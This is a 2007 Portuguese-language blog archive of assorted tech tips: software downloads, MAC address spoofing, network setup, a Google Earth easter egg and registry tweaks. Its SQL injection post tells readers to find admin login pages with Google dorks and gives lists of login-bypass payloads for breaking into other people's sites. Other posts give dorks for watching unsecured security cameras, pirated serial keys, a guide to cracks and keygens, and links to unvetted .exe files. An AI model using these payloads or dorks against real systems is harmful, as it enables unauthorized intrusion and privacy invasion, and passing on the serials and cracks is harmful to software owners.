sábado, 29 de setembro de 2007

.:[Download]PHP Designer 2007 - Professional::.

PHP Designer 2007 Professional é um editor de códigos PHP com diversas funções que pode ser utilizado tanto por desenvolvedores profissionais como por iniciantes.

Possui dicas e destaques coloridos de sintaxe, combina PHP, HTML, XHTML, CSS e SQL (Ingres, Interbase, MSSQL, MySQL, Oracle, Sybase e SQL padrão) e outras ferramentas 'extras' como cliente de FTP, gerenciador de FTP, modelos de códigos, gerenciador de arquivos, gerenciador de projetos, gerenciador de tarefas a fazer, suporte para snippet, auto-correção, bookmark, busca no Google e muito mais.

Download:
http://www.4shared.com/file/25309917/32d508e6/phde_wt.html

.::Enviando arquivo .exe por MSN, Sem precisar zipar::.

Bom pessoal, primeiro é bom ir em opções de pasta e ver se a opção Ocultar as extensões dos tipos de arquivo conhecidos esta marcada.

Veja:

http://img509.imageshack.us/img509/4783/62251390xk4zv3.png

http://img509.imageshack.us/img509/5111/27949079mr8zn7.png

Caso esteja marcada, na hora que vc for enviar o arquivo, vc tem que botar a extensão e um ponto no final. No meu caso aqui ela não estava marcada, então eu só botei o ponto no final.

http://img509.imageshack.us/img509/95/3copypi8uf8.gif

Após isso é só enviar!

.::Configurando uma Placa de Rede no Linux::.

O Linux Preview possui uma ferramenta para configuração de rede, que pode ser acessada por: Iniciar -> Sistema -> Administração -> Rede

Imagem:
http://img261.imageshack.us/img261/1917/2303082673bdf5c564abt7.jpg

Aparecerá uma tela pedindo a senha do administrador da máquina, você deverá fornecê-la. Em seguida abrirá o programa de Configurações de Rede.

Imagem:
http://img261.imageshack.us/img261/645/230308269f5edce7150jx8.jpg

Em primeira instancia, pode parecer estranha a tela de configuração, mas, logo explicarei detalhadamente os principais itens desta janela, para que você ou qualquer pessoa possa fazer esta configuração da sua placa de rede.

A opção Local: localizada na parte superior do aplicativo, lhe permite configurar diferentes perfis de placas de rede. Exemplo:

* Caso esteja com um notebook e a configuração de rede de seu trabalho seja diferente da configuração da rede de sua casa, não é necessária a reconfiguração recorrente da sua placa de rede, basta configurar apenas uma vez e salvar cada configuração em um perfil diferente. Quando trocar de "ambiente" de trabalho, basta alterar o perfil que sua máquina estará pronta para uso.

Para utilizar o recurso Local basta clicar na seta ao lado desta opção e clicar em Criar Localização.

Imagem:
http://img257.imageshack.us/img257/4839/2303082700c4b6cc4f4fe1.jpg

Na aba Geral, é possível fazer a escolha do Nome da Máquina na rede e escolher o domínio da rede em Nome do Domínio.

Imagem:
http://img257.imageshack.us/img257/7449/2303082737b57d769d2cj9.jpg

A aba de Conexões, mostra todas as sua placas de rede e dispositivos que possam se conectar com a rede. No nosso exemplo, a máquina possui apenas uma placa de rede e uma placa de fax modem.

Clicando na placa de rede e logo depois no botão Propriedades, será possível informar as configurações para sua placa de rede.

Imagem:
http://img523.imageshack.us/img523/3610/233140682758ea3072chi2.jpg

Clicando em OK na janela de Propriedades da interface e na janela de Configurações de Rede sua placa de rede estará configurada e funcionando.

.::Tutorial Mac Address::.

Em primeiro lugar gostaria de informar que o objetivo desse tutorial é apenas educativo e não deve ser motivo de inspiração para atos ilegais.


O objetivo nesse tutorial é explicar como deixar o endereço físico da placa de rede(Mac Address) mascarado. O Mac Address é composto por 12 caracteres e nada mais é do que um endereço que vêm de fábrica em cada Placa de Rede. Isso significa que cada placa possui um endereço físico em particular diferenciando uma da outra.

Para descobrirmos qual o endereço físico da nossa placa de rede façamos o seguinte:

Clique no menu iniciar executar digite "CMD" sem as aspas e clique em OK.

Na tela em seguir digite o comando: ipconfig /all e uma tela parecida com a imagem abaixo será mostrada.

Podemos observar o endereço MAC: 00-0C-29-40-BC-41

Imagem:
http://img529.imageshack.us/img529/4350/imagembz0fb5.png

Agora com a ajuda do Software Amac Address Change iremos Mascarar esse endereço. Nossa função é mudar o Mac 00-0C-29-40-BC-41 por 00-50-56-C0-00-08.

Após instalar o Software Amac Address Change, vamos executa-lo.

Change Mac Address of Network Card(s) ? Aqui vc escolhe qual seu adaptador de rede. Normalmente ele já escolhe por padrão.

Change Mac To ? Através dessa opção iremos modificar o Mac de nossa placa de rede, bastanto para isso digitar no quadrado ao lado o novo Mac.

Change Back ? Volta as configurações originais da placa de rede

IP address of this computer ? Mostra seu endereço de IP

MAC address of This Computer ? Mostra o endereço físico de sua placa de rede.

Scan Mac Address

Um pequenos Scanner com a opção de Fazer uma busca de IPs e mostrar os endereços Macs desses Ips localizados.

Imagem:
http://img529.imageshack.us/img529/4804/imagemug8el1.png

Após uma breve explicação das opções da tela vamos mascarar o endereço físico da placa de rede conforme demonstrado acima.

Para isso basta digitar o novo Mac Address e clicar na opção Change Mac to. Após isso, deverás reiniciar o computador e seu endereço estará mascarado.Agora a ilustração através de telas para o entendimento:MAC Atual ? 00-0C-29-40-BC-41

Imagem:
http://img529.imageshack.us/img529/2602/imagemtm0ve9.png

Digite o novo Endereço Mac 005056C00008 sem os espaços segundo tela a seguir e clique em Change Mac to.

Imagem:
http://img264.imageshack.us/img264/9213/imagemko7jk4.png

Na próxima tela ele pergunta se deseja mascarar seu endereço físico com o Mac informado.Clique em sim.
Imagem:

http://img264.imageshack.us/img264/2130/imagemzl2jz5.png

Agora para a mudança ser efetuada é necessário reiniciar seu computador. Clique em sim.

Após reiniciar o computador vamos ver o grande resultado na imagem abaixo, seguindo os mesmos passos descritos no inicio do tutorial para chegar nessa Tela.

Imagem:
http://img514.imageshack.us/img514/5632/imagemzw6af3.png

Conforme podemos observar o endereço físico foi mascarado com sucesso.

Agora iremos ver rapidamente como retroceder o processo e voltar ao endereço Físico da placa real. Para isso basta abrir o software Amac Address Change e clicar na opção Change Back. Confirma Duas vezes em OK.

Imagem:
http://img514.imageshack.us/img514/9151/imagemkd3uq7.png

Após Reinicar a máquina novamente veremos que o endereço físico da placa voltou a ser o original conforme a imagem abaixo.

Imagem:
http://img514.imageshack.us/img514/9136/imagemzs5nz0.png

Conclusão:
Esse é um ótimo Software para mascarar Mac address, mais contudo volto a ressaltar que o tutorial é apenas de caráter educativo. Hoje muitas pessoas apenas se preocupam em Esconder o IP real se esquecendo do endereço físico de sua placa de rede.Espero que gostem do tutorial e que sirva de conhecimento para todos.



Mac address,

http://rapidshare.com/files/57696530/amac.exe

a-Change Mac Address permite mudar seu endereço MAC de rede, busca endereços MAC utilizando qualquer intervalo de endereços IP, exporta os resultados da busca de uma lista lookup de endereços MAC e pode alterar o endereço MAC de sua placa de rede para qualquer outro endereço. Para todas as versões do Windows.

segunda-feira, 24 de setembro de 2007

.::Telefonando com a placa de fax/modem::.

Bom pessoal, como muita gente já sabe a placa de fax/modem não serve apenas para a internet discada. Na verdade a função dela nem é esta, mas como muita gente acabou acostumando a utilizar internet discada a partir de um placa de fax/modem, a verdadeira função dela acabou esquecida, até mesmo pelos fabricantes da placa. Existem placas de fax/modem que não servem para enviar um fax ou atender um telefonema.

Antiga, passada, esta ótima função das placas de fax/modem ficou esquecida, e quando um cliente resolve lhe pedir para atender o telefone via pc vc fica sem saber o que fazer,não é???!

Bom comigo foi assim, mas passado o susto e resolvido o problema eu resolvi mostrar para vcs passo-a-passo como fazer uma ligação via pc, e como atender tbm.

Você vai precisar de:

  • Uma placa de fax/modem (voice modem)
  • Um Headphone com microfone
  • Uma placa de som
  • E uma linha de telefone

Lembrando: caso vc utilize internet discada, não vai poder receber ligações e nem fax'es enquanto navega. Se vc utiliza internet banda-larga vai poder navegar normalmente, receber e fazer ligações ao mesmo tempo.

Bom em primeiro lugar instale suas placas no computador, para isso vc deve ter SLOTS PCI's livre na sua placa mãe, depois de instalado os novos itens de hardware vc vai precisar de baixar um programinha, o nome dele é FAXTALK, lembrando eu tentei utilizar outros programas, testei muitos aqui sem nenhum resultado. Principalmente aqueles encontrados no baixaki, não encontrei nenhum que funcionasse. Encontrei por acaso este programa dentro de um cd da LG, o modelo da placa que vem com o cd é LM-I56P, caso queira comprar a placa com o cd, esta no item utilidades do cd. Bom seguinte, baixe o programa de instalação, descompacte ele (está em formato RAR), e execute-o. Depois de instalar é só digitar o número a ser discado e clicar em alto-falante, coloque o headphone na cabeça e converse a vontade. Para atender ligações clique duas vezes no telefone que aparece ao lado do relógio e clique em alto-falante. Para enviar fax clique em arquivo/enviar-fax. Bom proveito.

Download:

Baixe o FAXTALK aqui

.::Easter Egg no Google Earth 4.2::.

Um simulador de vôos escondidinho no Google Earth! Descubra e desvende este recurso e faça vôos panorâmicos para onde você quiser.

O Google Earth 4.2 possui um Easter Egg (Ovo de Páscoa, em inglês). Em se tratando de softwares, o termo indica uma função, brincadeira ou recurso do programa escondido. O "ovinho" do Google Earth é nada menos que um simulador de vôo, com o qual você pode escolher entre dois modelos de avião e percorrer os mapas exibidos pelo programa.

Para acessar este recurso, acione a combinação Ctrl+Alt+A. Uma tela vai se abrir e você deve escolher entre duas aeronaves: um F16, um dos bombardeiros mais utilizados no mundo, e um SR22, um monomotor mais fácil de manejar.

Você pode começar o vôo do ponto atual do Google Earth ou escolher um dos aeroportos de todo mundo. Infelizmente, não há nenhum aeroporto brasileiro. É possível usar um joystick para controlar o avião. O Google Earth vai detectá-lo automaticamente, caso ele esteja corretamente instalado.

Selecionando a opção de voar a partir do ponto inicial, você pode, por exemplo, sobrevoar a sua casa! Escolha qualquer ponto do planeta para fazer um vôo panorâmico sobre ele. Selecionando um aeroporto, você vai decolar uma aeronave para o destino que quiser.
Veja a tela de início do simulador de vôos:
















Clique em “Iniciar Vôo” para começar. Os elementos do mapa serão carregados e isso pode levar alguns minutos.
















Caso você escolha voar do ponto onde você se encontra no Google Earth, automaticamente sua aeronave será posicionada no meio do mapa, o que pode gerar uma colisão.
Aprender a pilotar pode custar algumas tentativas. Uma vez que os recursos de ajuda estão indisponíveis, o jeito é na tentativa e erro mesmo.

Use os seguintes controles para pilotar:
  • Setas direcionais + Tecla Alt ou Ctrl: rotacionar ponto de visão.
  • Teclas Page Up / Page Down: aumentar / diminuir potência.
  • Setas direcionais para esquerda e direita: acionar ailerons.
  • Setas direcionais para cima e para baixo: mover elevadores.
  • Teclas Home e End: ajustar elevadores.
  • Teclas Insert e Enter (no teclado numérico): movimentar o profundor.
  • Teclas "(" e ")": ajustar flaps.
  • Teclas 5 e C: centralizar elevadores e profundor.
  • Tecla G: acionar/recolher o trem de pouso.
  • Teclas “,” e “.”: reversores esquerdo e direito.
  • Barra de espaço: pausar simulação.
  • Tecla H: exibir/esconder HUD (head-up display), o visor com os elementos da aeronave.
  • Teclas Ctrl + Alt + A: abrir a janela de opções do simulador.
  • Tecla Esc: sair do simulador.

O princípio básico para decolar um avião com o simulador de vôo do Google Earth é gerar potência com a tecla Page Up. Uma vez que o avião estiver com velocidade suficiente, use as setas direcionais para decolar. As teclas estão invertidas, como é de se esperar em qualquer simulador de vôo. Assim, use a seta para baixo para embicar o avião.
















Quando você estiver na altitude adequada, estabilize a aeronave.











Na teoria parece muito fácil. Porém, apesar de ser escondido, os controles do simulador de vôo do Google Earth são complexos. Pode ser que você precise praticar muito para decolar uma aeronave. Mas não é por causa disso que você será impedido de se divertir.


Se você quer voar sem a necessidade de decolar, bata intencionalmente o avião. Você será perguntado se deseja sair do simulador ou retomar o vôo.


Download do Google Earth 4.2:

http://baixaki.ig.com.br/download/Google-Earth.htm

.::HD's Extras e Gratís::.

Bom pessoal hoje eu venho trazer para todos vcs, algo que todos querem. Um (ou quantos vc quiser) HD novinho em folha, pequeno na verdade mas vc pode ter quantos quiser na hora que quiser.

Se eu lhe perguntasse qual o melhor e-mail, certamente vc me responderia o G-mail, mas o que poucos sabem é que além de ter direito a dois gigabites e meio de espaço para as suas mensagens, vc tbm pode usar o seu gmail como um HD virtual.

Como fazer isto? existe um programinha que se chama GMAILFS110, que cria um driver dentro do "Meu Computador", um driver normal como qualquer outro. A diferença está que ao clicar duas vezes no ícone ele vai pedir seu e-mail do gmail e sua senha. Quando vc insere as informações selecionadas ele faz login na sua conta do gmail e abre um drive para vc.

Agora imagine que neste drive vc pode colocar imagens, programas, jogos, etc..., ou seja tudo o que vc colocaria num hd normal. Claro que se você utiliza internet discada a sua velocidade de acesso ao drive não vai ser muito boa, mas se vc utiliza uma adsl ai na sua casa não fique esperando, teste agora mesmo.

Ao clicar no link que está no final desta postagem vc vai ser direcionado a uma página da internet onde poderá fazer o download do programa. Ele vai vir zipado como arquivo do winrar, caso não tenha o winrar pegue ele no baixaki e instale. Depois de instalar o winrar coloque o arquivo baixado numa nova pasta, clique com o botão direito no ícone do programinha do gmail e quando abrir o submenu com as opções clique na opção "extrair aqui", ele vai fazer uma extração dos arquivos. Para instalar clique duas vezes em "setup.exe", para utilizar entre no ícone "Meu Computador" que vc encontra no menu "Iniciar".

A Página de download do gmailfs está em outra lingua, apenas aguarde a contagem regressiva e salve o arquivo, se vc utiliza o internet explorer clique em "permitir download".

Download do gmailfs

Criar um gmail

quinta-feira, 20 de setembro de 2007

.::Internet Explorer abrindo mais rápido::.

No Windows Xp como também no Windows 2000, tem uma função que faz com que o Internet Explorer faça uma pesquisa por tarefas agendadas sempre que é aberto, isso ocasiona uma certa demora sempre que o Internet Explorer é aberto, mas tem um jeito de eliminar essa procura por tarefas agendadas editando o registro do sistema, siga esses passos:

Caminho: Iniciar>Executar>digite regedit
Procure a chave: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Explorer\RemoteComputer\NameSpace
Na coluna da direita procure a chave : ClassId key {D6277990-4C6A-11CF-8D87-00AA0060F5BF}

Delete essa chave sem medo. Feche o editor de registro e abra o Internet Explorer, você notará que o seu Internet Explorer abrirá muito mais rápido.

terça-feira, 18 de setembro de 2007

.::SQL INJECTION::.

Nesse tutorial vou esta mostrando a vocês como ter acesso a pagina de admin usando um metodo bem conhecido chamado SQLinjection ...mas porem muitos ainda tem duvidas...
Vamos la então espero que esse tutorial tire as duvidas da galera novata...

~~>primeiro você vai ter que achar o site vulneravel<~~

Entre no [www.google.com] e digite umas das strings abaixo:

allinurl:admin/index.asp
allinurl:admin/default.asp
allinurl:admin/admin.asp
allinurl:admin/login.asp
allinurl:/admin/entrar.asp
allinurl:/admin/default.asp
allinurl:/admin/index.asp
allinurl:/admin/login.asp
allinurl:/admin/password.asp
allinurl:/admin/senha.asp
allinurl:/login/login.asp
allinurl:/adm/login.asp
allinurl:/adm/index.asp
allinurl:/adm/default.asp
allinurl:/login/index.asp

~~>Vai aparecer varios sites para você ...entre em um link ...se cair na pagina de login do admin ...o site provavelmente é vulneravel

~~>Agora você tem que logar ....coloque no campo de login e senha umas das strings abaixo ...colocando sempre a MESMA nos dois campos.. (login e senha)

b' or ' 1='
' or '1
' or '
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
) ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --

Agora galera e com vcs bastam ter um pouco de boa vontade e achar um site vulneravel...

STRINGS DE PESQUISA NO GOOGLE

allinurl:admin/index.asp
allinurl:admin/default.asp
allinurl:admin/admin.asp
allinurl:admin/login.asp
allinurl:/admin/entrar.asp
allinurl:/admin/default.asp
allinurl:/admin/index.asp
allinurl:/admin/login.asp
allinurl:/admin/password.asp
allinurl:/admin/senha.asp
allinurl:/login/login.asp
allinurl:/adm/login.asp
allinurl:/adm/index.asp
allinurl:/adm/default.asp
allinurl:/login/index.asp
allinurl:/login/default.asp
allinurl:/webmaster/login.asp
allinurl:/webadmin/default.asp
allinurl:/webadmin/index.asp
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
allinurl:/web/admin/default.asp
allinurl:/web/admin/login.asp
allinurl:/home/adm/login.asp
allinurl:/home/adm/senha.asp

STRINGS DE LOGIN E SENHA

b' or ' 1='
' or '1
' or '
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a

.::Aprenda a criar um ponto de restauração::.

Restauração do Windows

Antes de instalar qualquer programa você pode criar um ponto de restauração do Windows, assim, se não gostar do programa ou se ele não funcionar corretamente, basta simplesmente restaurar o sistema para um ponto anterior à instalação do programa.

Mas o que é um ponto de restauração?Um ponto de restauração no sistema permite desfazer alterações feitas ao computador e restaurar configurações e o desempenho sem que você perca trabalhos recentes, como documentos salvos, emails ou listas de histórico e de favoritos.

Mto bom caso vc tenha baixado um arquivo e dar pau, ou caso tenha colocado um vírus no seu pc, vc pode sempre criar um ponto de restauração para se prevenir contra problemas.


Passo 1

Clique no menu Iniciar, depois em Todos os programas > Acessórios > Ferramentas do sistema > Restauração do sistema

Passo 2

Marque a opção Criar um ponto de restauração e clique em Avançar

Passo 3

Digite uma descrição qualquer para este ponto de restauração e clique em Criar

Passo 4

Pronto, em vermelho aparecem as informações sobre o ponto de restauração. Basta clicar em Fechar e pronto, seu sistema está pronto para ser restaurado quando você quiser.

.::[Download]CrossLoop - Acesso Remoto::.

CrossLoop é uma forma fácil e muito descomplicada de se conectar dois computadores quaisquer pelo mundo, permitindo a comunicação entre as máquinas de um modo efetivo e ideal até para os usuários que nunca imaginaram poder fazer esse tipo de conexão.

Assim, você pode constituir o chamado "acesso remoto", que lhe possibilita ver tudo o que se passa na tela do outro computador, ou até mesmo controlar suas funções à distância. Esse tipo de acesso é especialmente útil quando se quer resolver problemas no sistema sem precisar estar presente fisicamente, sendo um meio adotado principalmente por profissionais da área de assistência e suporte técnico, para a resolução de problemas dos usuários.

Fácil até para os iniciantes!
Porém, você não precisa ser um profissional para encontrar muitas utilidades num software como esse, que inclui até a transferência de arquivos direta e segura, com direito ao sistema de proteção de criptografia através de um algoritmo de 128 bits e de um código de acesso gerado aleatoriamente e contendo doze dígitos.

E, se esses dados não significam muito para você, não se preocupe, pois de complicado o programa só tem o sistema de segurança, já que o seu uso é voltado para todos os níveis de usuários e só exige alguns cliques para que a conexão seja efetivada. Para você ter idéia de como ele é fácil, pense que a conexão pode ser iniciada com apenas o preenchimento de um campo com o código de acesso fornecido pelo outro usuário, para que ele já possa aceitar a requisição e começar a navegar na tela alheia.

Fora as funções técnicas do programa, existem também uma série de opções de visuais diferentes para você aplicar à interface do programa, mudando suas cores de acordo com seis esquemas prontos para usar e deixar o seu visual ainda mais atrativo.

Link para download:
http://w14.easy-share.com/3038331.html

.::Como Fazer um Deface Sem Correr Riscos::.

Galera isso nada mais é doque um tipo de brincadeira um deface pra quem não quer se arriscar deem uma olhada...


>>>Primeiramente la em baixo tera a opção idioma dai vc escolhe o seu no caso pt...

1-Após mudado o idioma o primeiro formulario estara escrito alvo>> No caso pedira uma URL vo digita a do seu site desejado...

2-Depois tera um chamado desastre vc escolhe a opção melhor para vc, essa opção que vc escolher ai sera a que ira aparecer no site desejado...

3-aperte GO,dependendo da opção no campo desastre que vc escolher podera aparecer algumas opções a mais dai estar em portugues blz...


>>>>o site como se tivesse sido modificado por vc,o site ficara no fundo e na frente aparecera a sua animação...como se o codigo do site fosse alterado e vc tivesse editado ele vale apena conferir.


>>>Primeiramente la em baixo tera a opção idioma dai vc escolhe o seu no caso pt...

1-Após mudado o idioma o primeiro formulario estara escrito alvo>> No caso pedira uma URL vo digita a do seu site desejado...

2-Depois tera um chamado desastre vc escolhe a opção melhor para vc, essa opção que vc escolher ai sera a que ira aparecer no site desejado...

3-aperte GO,dependendo da opção no campo desastre que vc escolher podera aparecer algumas opções a mais dai estar em portugues blz...

>>>>o site como se tivesse sido modificado por vc,o site ficara no fundo e na frente aparecera a sua animação...como se o codigo do site fosse alterado e vc tivesse editado ele vale apena conferir.


Isso ajuda a entender oque é um deface e oque vc pode fazer ao ao obter privilégio sobre um codigo espero que gostem...

segunda-feira, 17 de setembro de 2007

.::Pegar músicas da Rádio UOL::.

Instalando o Programa:

1. Baixe e instale o programa HiDownload. http://www.4shared.com/file/11171676/5848aecf/hidownload.html (na janela que se abrir clique em ?Download file?)
2. Aberto o programa, ignore janelas de registro.
3. Clique, na parte superior, em: ?Registration > Register HiDownload?
4. Na janela que se abrir, preencha os campo ?User? e ?Email? com dados de sua preferência, não precisa ser seu e-mail e nome verdadeiros.
5. Nessa mesma janela, em ?Key?, cole esse serial: 832523018fbe7f427d4fdf6562fbb110713ba22ee
6. Clique no botão ?Reg?.

Localizando as músicas:

1. Entre em http://www.uol.com.br/radio. Para evitar problemas entre pelo Internet Explorer, pelo Firefox você tem que instalar um plugin para ouvir a música.

2. Pesquise por uma música qualquer. (se você colocar um CD para tocar, o programa vai baixar as 10 primeiras músicas do CD, logo abaixo ensinarei a baixar todas as músicas do cd).

3. Quando você abrir a música e ela começar a tocar, você verá no meio da janela, do seu lado esquerdo, uma caixinha em que aparecem em roxo as palavras ?carregando? ou ?fazendo buffer? ou ?executando?.

4. Clique nessa caixinha com o botão direito, se nada acontecer, clique primeiro com o botão direito, depois com o esquerdo.

5. Escolha ?Propriedades? e depois copie tudo que estiver em ?Local:?

Baixando as músicas:

1. Abra o programa, clique em ?File > Add a URL to download?. Ou clique no ícone em que aparece uma folhinha e um ?+? verde.

2. Em ?URL?, cole o endereço que você copiou de ?Local? no item 5 acima.

3. Por algum motivo estranho, em ?Save to? não adianta colocar a pasta em que você quer a música.

4. Clique em ?OK? e espere o download da música.

5. Feito isso, a música irá para a pasta ?C:/HiDownload?.

Baixando CDs inteiros:

Como já foi dito, o ?HiDownload? só baixa dez músicas de cada CD. Mas para tudo há um jeito! Basta você clicar com o botão direito em qualquer música do CD enquanto é baixada na janela do programa e escolha a opção ?Copy URLs to Clipbroad?. Clique em ?File > Add a URL to download? e clique na caixa ?URL? como botão direito e escola ?colar?. Essa parte é mais complicada, você terá que observar bem que em meio a muitos números e letras que você acabou de colar, que é o endereço da música, existe uma parte parecida com essa, é claro, com números diferentes: ?000000-0_01_00.asf?. ?01? é o número da música no CD. Então substitua o ?01? por ?11?, depois repita o processo para ?12?, ?13?, até baixar todas as músicas do CD. (Essa parte ficou confusa, não é?)As músicas, como já disse, tem o formato ?.asf 20 kbps?, você pode convertê-las para ?.mp3? com qualquer programa de conversão. Você pode encontrar um desse programas aqui mesmo na ?google?.

.::Como usar Cracks/Patchs/Seriais/Keygen ::.

Keygen: isso é um programa que gera seriais, seriais são número com os quais você pode registrar o seu programa como se o tivesse comprado. Então você copia o número (pode ser alfanúmerico) que esse programa gera e cola na parte de registro do software.

Patch: Ele altera alguns bytes no código do arquivo, sendo o arquivo uma dll ou executável fazendo-o ficar completo. Invés do programa executar, quando digitado o serial errado, uma rotina dizendo que o serial não é válido ele executa a rotina dizendo que o programa foi registrado corretamente. Para patchear os programas normalmente você tem que copia-los para a pasta onde foi instalado o programa e rodar o patch lá, aí ele valida o programa.

Loader: Ele carrega o programa modificando algo na memória dele, você deve abrir o programa através do Loader para que o soft seja completo.

RegFile: Podem vir arquivos .reg que devem ser 'executados' e então, adicionados ao registro. Quando clicamos no arquivo ele pergunta se queremos adicionar os valores ao registro, responda sim. O programa irá ler o registro e ver que os dados para registrá-lo estão lá, agindo como completo.

KeyFile: É o mesmo principio acima, só que geralmente coloca-se o arquivo .key dentro da pasta onde o programa está instalado. O programa lê o arquivo e verifica que foi registrado.

Cracked/Patched: É o executável já crackeado, já modificado, então ele não pede nenhum tipo de registro. Está completo. Podem ocorrer casos de algumas limitações que o cracker não tenha liberado. Para crackear os programas normalmente você tem que copiar os arquivos para a pasta onde foi instalado o programa e mandar substituir os já existentes ai ele valida o programa.

Retail: Seria a versão completa, sem necessidades de inserir serial ou outro código.


E lembrando que, alguns anti-vírus podem detectar como malware um dos arquivos citados acima!!! E na verdade são, mas não nocivos ao seu computador (no geral), porque ele altera códigos. ^^

.::Câmera de segurança pelo Google::.

Aprenda aki a ver camera de segurança pelo google.

O Google é o melhor buscador q existe...

Então se vc usar a sequencia de comandos certos e conseguir filtrar bons resutados consegue coisas maravilhosas...e uma delas é essa ver camera de segurança...é so vc ir no google e colocar alguns desses comandos na barra de busca e dar a sorte de encontrar uma bela camera ligada pra vc fuxicar em seu BBB particular...

inurl:ViewerFrame?Mode="
inurl:MUltiCameraFrame:?Mode="
inurl:view/index.shtml"

Olha só: http://domecam.uridium.ch/MultiCameraFrame?Mode=Motion&Language=9
/\
/

\
(Esse é ao vivo)

.::[Download]HD Virtual 2GB

É muito simples ter um, basta vc ter uma conta no Gmail.com

Hoje para se ter um conta no Gmail é mais simples que antes pois nao precisa mais de cpnvites tals.

Depois de obter uma conta no Gmail, vc precisa ter o seguinte programa:

http://baixaki.ig.com.br/site/detail35122.htm

Depois d instalar surgira uma especie de novo drive em meu computador.

Daí vc coloca o login e senha que fez no cadastro do Gmail e de preferência marque em auto login para que ele abra nas próximas vezes sem precisar de logar.

Tranferir arquivos

Para transferir arquivos abra o Gmail Drive e em outra janela abra a pasta onde contém o arquivo que pretende mandar para o HD virtual.

Basta apenas clicar e segurar no documento que vai tranferir para o Gmail Drive e arrastar até ele.

.::[Download]Hide IP Platinum

Preocupado com privacidade na Internet? Gostaria de ocultar seu endereço IP? Hide IP Platinum é o software que você procurava. Ele encontra um servidor proxy disponível e o configura automaticamente. Não há mais para se preocupar.

Hide IP Platinum procura por servidores anônimos e torna seu computador invisível para os websites que você surfa. Proteja-se de qualquer website que queira monitorá-lo e acessar informações através do seu endereço IP. Evite que informações pessoais sejam usadas para enviar spam e e-mails marketeiros para você ou outros usuários da Internet.

Download: http://v7soft.net/download/hideippla.exe

Serial: 5ABF941CFC3706DE

sábado, 15 de setembro de 2007

.::Vários sites para upload/download de arquivos::.

Sites para uploads de arquivos:

www.4shared.com - requer registro grátis - 100 MB max.
www.mediafire.com - 100 MB por arquivo, registro opcional, sem limite de arquivos, sem enxeção para baixar!
www.flyupload.com - 2 GB por arquivo! sem limite de arquivos.
www.bigupload.com - 500 MB por arquivo.
www.easy-share.com - bom mas chatinho às vezes para baixar, uma boa é que permite carregar via FTPrapidshare.de - Um dos primeiros a se destacar, hoje é ruim pra quem vai baixar, que tem que esperar muito tempo entre um arquivo e outro. 100 MB por arquivo, apaga depois de 90 dias sem ninguém baixar.
www.arquivoweb.net - Site nacional, arquivos de até 100 MB. Arquivos ficam no ar por 3 meses apenas.
www.da_insane.boo.pl/d/upload - tTipos de arquivo permitidos: gif, JPG, jpg, jpeg, JPEG, png, txt, nfo, doc, rtf, htm, dmg, zip, rar, gz, exe - limite: 10 MBwww.datapickup.com- 1.5 GB max - opcionalmente envia para email - 7 dias ou 25 downloads.
www.dropload.com - espaço: 100MB - limite: 7 dias.
www.fileanchor.com - max 1MB por arquivo, 90 dias, banda “ilimitada”
www.filecabi.net - tipos de arquivo aceitos : .wmv .avi .mpg .mov .swf .asx .jpg .gif .png .pdf - Armazenamento “para sempre” 10 MB max - basicamente arquivos engraçados, sexy, estúpidos, perturbantes e bizarros.
www.sharefiles.ru - limite 50MB - banda limitada, proteção por senha, site russo.
www.swiftdesk.com - 30 MB max - requer registro, grátis.
www.turboupload.com - beta - 70 MB max.
www.ultrashare.net - limite 28,6 MB, sem limite de banda, arquivo removido se não baixado por 30 dias.
www.updownloadserver.com - 250 MB max - download só depois que o administrador aprovar - permanece por 30 dias.
www.uploadhut.com - limite 50 MB, todos tipos permitidos, roda Linux.
www.uploadporn.com - limite 30MB, só aceita pornografia.
www.uploadtemple.com - não aceita php e mp3 - limite por arquivo 30 MB, permanência desconhecida.
www.webfile.ru - limite 20MB, banda limitada, proteção por senha, site russo.
www.wtfhost.com - limite 25 MB, requer registro grátis.
www.yousendit.com - limite 1GB, suporta "resume" (recontinuação de download interrompido), limite 25 downloads ou 7 dias.
www.youshareit.com - virou megaupload.com.

.::[Segurança] Cookies::.

O que é um Cookie?

Um Cookie é um tipo de arquivo que armazena em seu micro as configurações escolhidas para uma determinada página ou site. Quando retornar àquela página, as informações gravadas no cookie serão enviadas para o site, com o nobre objetivo de não apenas reduzir o tempo de acesso mas sobre tudo personalizá-lo.

Mas então qual o perigo?

O problema é que, como o cookie passa sempre por baixo das pernas do proprietário do micro, um Web Master mal intencionado pode programar os cookies para gravarem algumas informações de seu computador e enviar essas informações para outras pessoas.

E como posso me proteger, afinal?

Pode se proteger tomando algumas precauções como: não visitando sites não confiáveis ou duvidosos, instalando um bom regulador de cookies em seu computador e mantendo seu browser sempre bem atualizado.

.::Criptografia de Dados::.

"A criptografia é uma arte: A arte de escrever ocultamente. Talvez tão antiga quanto a própria escrita, hoje é um dos métodos mais eficientes de se transferir informações, sem que haja a possibilidade de comprometimento do sigilo."

Uma possibilidade de segurança de dados que nunca deveria ser esquecida é a criptografia e a decodificação dos dados antes que eles sejam enviados para a rede.Na Suécia, todas as comunicações de dados devem ser criptografados (por ordem do governo) e existe um mercado próspero de modems de criptografia. Os Estados Unidos fariam bem em considerar medidas parecidas.Vários utilitários estão disponíveis para que se possa criptografar mensagens. Com o UNIX padrão, o comando crypt permite que você aplique ao conteúdo dos arquivos a mesma rotina confusa usada para criptografar senhas. quando recebidas do outro lado, elas podem ser decodificadas para leitura.A criptografia de arquivos de correio eletrônico podem ser combinados de forma letal usando os três comandos seguintes:
» enroll
» xsend
» xget

